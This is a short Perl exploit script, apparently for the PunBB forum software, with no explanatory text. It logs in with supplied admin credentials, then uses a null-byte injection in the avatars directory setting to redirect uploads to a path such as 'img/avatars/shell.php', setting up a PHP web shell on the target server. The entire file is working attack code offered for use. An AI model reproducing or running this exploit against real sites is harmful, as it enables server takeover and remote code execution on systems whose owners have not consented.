#!/usr/bin/perl -w

use HTTP::Cookies;
use LWP;
use URI::Escape;

unless(@ARGV){die "USE:\n./punbb.pl localhost.com/forum/ admin pass img/avatars/shell.php\n"}

my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)',timeout=>10);



$ua->cookie_jar( HTTP::Cookies->new());


$url='http://'.$ARGV[0].'/login.php?action=in';
$data="form_sent=1&req_username=".$ARGV[1]."&req_password=".$ARGV[2]."&login=Login";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$req->referer('http://'.$ARGV[0].'/login.php');
my $res = $ua->request($req);


$url='http://'.$ARGV[0].'/admin_options.php?action=foo';
$data='form_sent=1&form[board_title]=board&form[avatars]=1&form[avatars_width]=300&form[avatars_height]=300&form[avatars_size]=10240&form[admin_email]=mail@mail.com&form[webmaster_email]=mail@mail.com&form[timeout_visit]=600&form[timeout_online]=300&form[avatars_dir]='.$ARGV[3].'/%00/';
 $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$req->referer('http://'.$ARGV[0].'/admin_options.php');
$res = $ua->request($req);


$content=$res->content;
print $content;